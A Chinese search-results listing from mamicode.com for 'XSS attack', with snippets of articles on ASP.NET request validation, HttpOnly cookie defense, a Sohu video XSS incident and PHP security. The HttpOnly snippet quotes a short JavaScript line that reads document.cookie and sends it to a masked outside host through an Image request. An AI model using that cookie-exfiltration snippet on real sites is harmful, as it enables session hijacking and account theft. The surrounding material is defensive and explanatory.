码迷,mamicode.com
首页 >  
搜索关键字:xss攻击    ( 495个结果
解决asp.net中“从客户端中检测到有潜在危险的Request.Form值”的问题
在提交表单时候,asp.net 提示:"从客户端(......)中检测到有潜在危险的 Request.Form 值" 。asp.net中的请求验证特性提供了某一等级的保护措施防止XSS攻击,asp.net的请求验证是默认启动的。这个给出各个版本.net的解决方法。asp.net 2.0 通常解决办法...
分类:Web程序   时间:2014-07-22 23:06:35    阅读次数:401
我的安全测试面试_自问自答,不亦乐乎
不想做黑客的安全测试不是优秀的cybercop。怎么才能算是优秀的cybercop呢?那么就就必须学会或懂的黑客惯用一些手法与业内所流行的一些漏洞。加QQ群:1366117821、常见的几种攻击手段CC攻击XSS攻击CSRF攻击SQL注入攻击TCP全连接攻击框架重定向攻击惯性思维逻辑攻击WEB Se...
分类:其他好文   时间:2014-05-26 21:03:10    阅读次数:361
利用HttpOnly来防御xss攻击
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。 如下js获取cookie信息:  url=document.top.location.href;  cookie=document.cookie;  c=new Image();  c.src=’http://www.******.c...
分类:其他好文   时间:2014-05-22 08:24:14    阅读次数:273
XSS攻击:SOHU视频XSS漏洞导致其用户成为DDOS肉鸡
XSS,即跨站脚本攻击。SOHU视频XSS漏洞导致其用户成为DDOS肉鸡,该攻击是利用的一个持久性XSS,通过找到一个访问量很大网站的xss,在其网站上插入一段js代码,当其用户访问网站之后,就可以利用该网站的用户对其受害者发起攻击。...
分类:其他好文   时间:2014-05-06 22:42:53    阅读次数:418
php中一些安全性防止问题建议
只要我们作好了各类操作就可在基本防止一些朋友利用网站本身的漏洞进行网站操作了,很多在php中都有的如XSS用 htmlentities()预防XSS攻击还有sql注入可以用mysql_real_escape_string操作等。PHP包括其他任何网络编程语言的安全性,具体表现在本地安全性和远程安全性...
分类:Web程序   时间:2014-05-01 16:32:57    阅读次数:436
495条   上一页 1 ... 48 49 50
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!